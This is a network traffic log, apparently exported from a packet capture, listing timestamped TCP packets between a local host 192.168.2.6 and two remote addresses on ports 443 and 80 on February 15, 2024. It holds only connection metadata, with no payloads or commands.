Feb 15, 2024 19:42:27.216789007 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216798067 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216809034 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216818094 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216840029 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216869116 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216875076 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216887951 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216890097 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216907978 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216938972 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216944933 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216959000 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216959000 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216983080 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217015028 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217020988 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217032909 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217036963 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217055082 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217087984 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217098951 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217112064 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217112064 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217132092 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217164993 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217170954 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217185020 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217185020 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217205048 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217238903 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217245102 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217257977 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217267036 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217288017 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217319012 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217324972 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217338085 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217339993 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217358112 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217386961 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217394114 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217405081 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217408895 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217431068 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217462063 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217469931 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217479944 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217483997 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217503071 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217530966 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217536926 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217547894 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217554092 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217567921 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217581034 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217586994 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217614889 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217655897 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217670918 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217701912 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217709064 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217720032 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217721939 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217741013 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217780113 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217786074 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217798948 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217798948 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217817068 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217847109 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217853069 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217868090 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217871904 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217907906 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217916965 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217922926 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.217963934 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217986107 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.217998981 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218014002 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218044996 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218050957 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218063116 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218067884 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218082905 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218115091 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218121052 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218136072 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218141079 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218151093 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218198061 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218216896 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218271971 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218396902 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218405008 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218436956 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218476057 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218482018 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218492985 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218516111 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218533039 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218537092 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218548059 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218552113 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218573093 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218579054 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218610048 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218615055 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218626022 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218646049 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218647957 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218677998 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218683004 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218697071 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218704939 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218713999 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218736887 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218743086 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218755007 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218765020 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218797922 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218806982 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218818903 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218848944 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218868017 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218883038 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218914032 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218919992 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218930960 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218934059 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218951941 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218981981 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.218987942 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.218998909 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219000101 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219014883 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219048977 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219055891 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219069004 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219072104 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219089985 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219125032 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219130993 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219141006 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219150066 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219163895 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219188929 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219194889 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219209909 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219213009 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219232082 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219259977 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219269991 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219280958 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219331980 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219347954 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219374895 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219381094 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219396114 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219398975 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219420910 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219449997 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219460011 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219470978 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219471931 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219485998 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219516039 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219522953 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219537020 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219540119 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219557047 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219589949 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219595909 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219607115 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219616890 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219621897 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219640017 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219646931 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219671011 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219672918 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219700098 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219702005 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219717026 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219732046 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219748974 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219764948 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219779015 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219810963 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219827890 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219837904 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219839096 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219865084 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219877005 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219897985 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219907045 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219913960 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219933987 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219949961 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.219955921 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219966888 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219985008 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.219991922 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.220011950 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.220019102 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.220035076 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.220040083 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.220051050 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.220077038 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.220083952 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.220098019 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.220105886 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.220118046 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.220151901 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.220154047 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.220168114 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.220175982 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.220185041 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.220200062 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.220208883 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.220216036 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.220237017 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.220287085 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.220323086 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.220436096 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.220659971 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.223146915 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:31.078397989 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.182069063 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.182152033 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.182292938 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.291681051 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.291745901 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.291764021 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.291781902 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.291799068 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.291802883 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.291832924 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.291845083 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.291862965 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.291886091 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.291898012 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.291914940 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.291933060 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.291937113 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.291969061 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.395497084 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.395519972 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.395558119 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.395611048 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.395612001 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.395657063 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.395701885 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.395719051 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.395757914 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.395876884 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.395911932 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.395953894 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.395994902 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.396013021 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.396029949 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.396049976 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.396056890 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.396076918 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.396094084 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.396095991 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.396111012 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.396126986 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.396131039 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.396142960 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.396157026 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.396159887 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.396176100 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.396195889 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.396208048 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.396245003 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.499209881 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499249935 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499267101 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499325991 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499346972 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.499377012 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499392986 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499392986 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.499432087 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.499476910 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499547958 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499598980 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499622107 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.499661922 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499680996 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499703884 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.499730110 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499762058 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499775887 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.499788046 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499833107 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.499856949 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499875069 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499891996 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499916077 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.499922991 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499941111 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499957085 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499962091 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.499974012 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499989986 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.499993086 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.500008106 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500024080 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500029087 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.500055075 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500065088 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.500101089 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500118971 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500135899 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500138044 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.500178099 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.500195026 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500214100 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500236034 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500252962 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500255108 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.500269890 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500296116 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.500328064 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500370979 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.500382900 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500401020 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500432968 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500441074 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.500473976 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500492096 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500513077 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.500516891 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.500559092 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.603050947 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603086948 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603105068 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603131056 CET	80	49723	172.245.214.91	192.168.2.6
